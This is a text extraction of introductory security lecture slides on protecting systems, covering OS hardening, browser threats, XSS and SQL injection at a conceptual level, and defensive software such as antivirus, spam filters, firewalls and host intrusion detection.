Objectives in chapter 3: Explain how to harden operating systems, list ways to prevent attacks through a Web browser, define SQL injection and explain how to protect against it, explain how to protect systems from communications-based attacks, describe various software security applications.
Trang 1
Protecting Systems
Trang 3v Explain how to harden operating systems
v List ways to prevent attacks through a Web browser
v Define SQL injection and explain how to protect against it
v Explain how to protect systems from based attacks
communications-v Describe various software security applications
Trang 4
Hardening the Operating System
Trang 5v Updates to the operating system
v Protecting against buffer overflows
v Configuring operating system protections
Trang 6v Operating systems are huge and contain many bugs (errors in code)
v Linux contains 0.17 bug per 1,000 lines of code
v Typical commercial software contains 20-30 bugs per 1,000 lines of code
v 81 bugs a day were reported for Windows Vista Beta 2
v Some of those bugs create vulnerabilities
Trang 7Managing Operating System Updates
Trang 9v Security patch
v A general software security update intended to cover vulnerabilities that have been discovered
v Hotfix addresses a specific customer situation
v Often may not be distributed outside that customer’s organization
v Service pack
v A cumulative package of all security updates plus additional features
Trang 10Update Terminology
Trang 12v Used to manage patches locally instead of relying upon the vendor’s online update service
v Advantages
v Administrators can test patches before deploying them
v Every machine is updated simultaneously
v Users cannot disable or circumvent updates
v Can save bandwidth and time
v Computers that do not have Internet access can receive updates
Trang 14v Buffer overflow
v Occurs when a process attempts to store data in random access memory (RAM) beyond the boundaries of a fixed- length storage buffer
v Extra data overflows into the adjacent memory locations and under certain conditions may cause the computer to stop functioning
v Attackers also use a buffer overflow in order to compromise a computer
Trang 15Buffer Overflow Protection
Trang 16v Data execution prevention (DEP)
v Address space layout randomization (ASLR)
Trang 20v Download Process Explorer
v http://technet.microsoft.com/en-us/sysinternals/default.aspx
v View, Show Lower Pane
v View, Lower Pane View, DLLS
v View, Select Columns, DLL tab, Base Address
v Select explorer.exe and find ntdll.dll
v Reboot to see base address change
Trang 21How to See ASLR
Trang 23
Preventing Attacks That
Target the Web Browser
Trang 25v Cookies can pose a privacy risk
v Cookies can be used to track the browsing or buying habits of
a user
v Defenses against cookies include disabling the creation of cookies or deleting them once they are created
Trang 26v Visiting a Web site that automatically downloads a program
to run on a local computer can be dangerous
Trang 27JavaScript
Trang 28v Several defense mechanisms prevent JavaScript programs from causing serious harm:
v JavaScript cannot read or write files
v JavaScript cannot connect to other machines on your LAN
v Other security concerns remain:
v JavaScript programs can capture and send user information without the user’s knowledge or authorization
v The defense against JavaScript is to disable it within the Web browser
Trang 30Java
Trang 31v Sandbox is a defense against a hostile Java applet
v Surrounds program and keeps it away from private data and other resources on a local computer
v Two types of Java applets:
v Unsigned Java applet: program that does not come from a trusted source
v Signed Java applet: has information proving the program is from a trusted source and has not been altered
Trang 32Java
Trang 33v Set of technologies developed by Microsoft
v Not a programming language but a set of rules for how applications should share information
v ActiveX controls
v Also called add-ons or ActiveX applications
v Represent a specific way of implementing ActiveX
v Can perform many of the same functions of a Java applet, but
do not run in a sandbox
v Have full access to Windows operating system
v ActiveX poses a number of security concerns
Trang 34v Nearly all ActiveX control security mechanisms are set in Internet Explorer
v ActiveX controls do not rely exclusively on Internet Explorer
v However, can be installed and executed independently
v The defense against ActiveX is to disable it within the Web browser
Trang 36v Cross Site Scripting (XSS) attack steps
v An attacker searches for a Web site that redisplays a bad login (See Figures 3-8 and 3-9)
v The attacker then creates an attack URL that contains the embedded JavaScript commands
v A fake e-mail is sent to unsuspecting users with the attack URL as a modified embedded link in the e-mail
v The unsuspecting victim clicks on the attack URL and enters his username and password
Trang 37Cross Site Scripting (XSS)
Trang 40v Defenses against XSS involve both Web masters of legitimate sites as well as users
v Webmasters should check that all user input is validated and that attackers do not have the ability to inject code
v They also should be sure that all Web services and database software is patched to prevent XSS
v Users should never click on embedded links in e-mails
Trang 41v One of the most common types of attacks
v Uses a form of injection like XSS
v Hinges on an attacker being able to enter an SQL database query into a dynamic Web page
v SQL (structured query language)
v A language used to view and manipulate data that is stored in
a relational database
Trang 42v Hackthissite.org
v Don't put anything true about you on this site they are real criminals
Trang 43v Displays entire username database
Trang 44SQL Injection
Trang 45v Variations to the SQL injection attack
v Deleting data from the database
v Accessing the host operating system through function calls
v Retrieving a list of all usernames and passwords
Trang 46Hardening Web Servers
Trang 47v E-mail systems use two TCP/IP protocols to send and receive messages
v Simple Mail Transfer Protocol (SMTP) handles outgoing mail
v Post Office Protocol (POP3 for the current version) handles incoming mail
v IMAP (Internet Mail Access Protocol)
v A more advanced protocol that solves many problems
v E-mail remains on the e-mail server
v Mail can be organized into folders and read from any computer
v Current version is IMAP4
Trang 48SMTP Open Relays
Trang 50v Instant messaging (IM)
v Real-time communication between two or more users
v Can also be used to chat between several users simultaneously, to send and receive files, and to receive real- time stock quotes and news
v Basic IM has several security vulnerabilities
v IM provides a direct connection to the user’s computer; attackers can use this connection to spread viruses and worms
v IM is not encrypted by default so attackers could view the content of messages
Trang 51v Steps to secure IM include:
v Keep the IM server within the organization’s firewall and only permit users to send and receive messages with trusted internal workers
v Enable IM virus scanning
v Block all IM file transfers
v Encrypt messages
Trang 52v Peer-to-peer (P2P) network
v Uses a direct connection between users
v Does not have servers, so each device simultaneously functions as both a client and a server to all other devices connected to the network
v P2P networks are typically used for connecting devices on
Trang 53v With BitTorrent, files are advertised
v BitTorrent downloads are often illegal and contain malware
Trang 54v Antivirus
v Anti-spam
v Popup blockers
v Personal software firewalls
v Host intrusion detection systems
Trang 55v Antivirus (AV) software
v Scan a computer for infections as well as monitor computer activity and scan all new documents, such as e-mail attachments, that might contain a virus
v If a virus is detected, options generally include cleaning the file of the virus, quarantining the infected file, or deleting the file
v The drawback of AV software is that it must be continuously updated to recognize new viruses
v AV software use definition files or signature files
Trang 56v Allows the user to limit or block most popups
v Can be either a separate program or a feature incorporated within a browser
v As a separate program, popup blockers are often part of a package known as antispyware
v Helps prevent computers from becoming infected by different types of spyware
Trang 57Popup Blockers
Trang 58v Two different options for installing a corporate spam filter
v Install the spam filter with the SMTP server
v See Figure 3-14
v Install the spam filter with the POP3 server
v See Figure 3-15
Trang 59AntiSpam
Trang 61v A third method is to filter spam on the local computer
v Typically, the e-mail client contains several different features to block spam, such as:
v Level of junk e-mail protection
v Blocked senders
v Allowed senders
v Blocked top level domain list
v A final method of spam filtering is to install separate filtering software that works with the e-mail client software
Trang 63v Firewall, sometimes called a packet filter
v Designed to prevent malicious packets from entering or leaving computers
v Can be software-based or hardware-based
v Personal software firewall
v Runs as a program on a local system to protect it against attacks
v Many operating systems now come with personal software firewalls
v Or they can be installed as separate programs
Trang 64v Monitors network traffic
v Detects and possibly prevents attempts to
v HIDS are software-based and run on a local computer
v These systems can be divided into four groups:
v File system monitors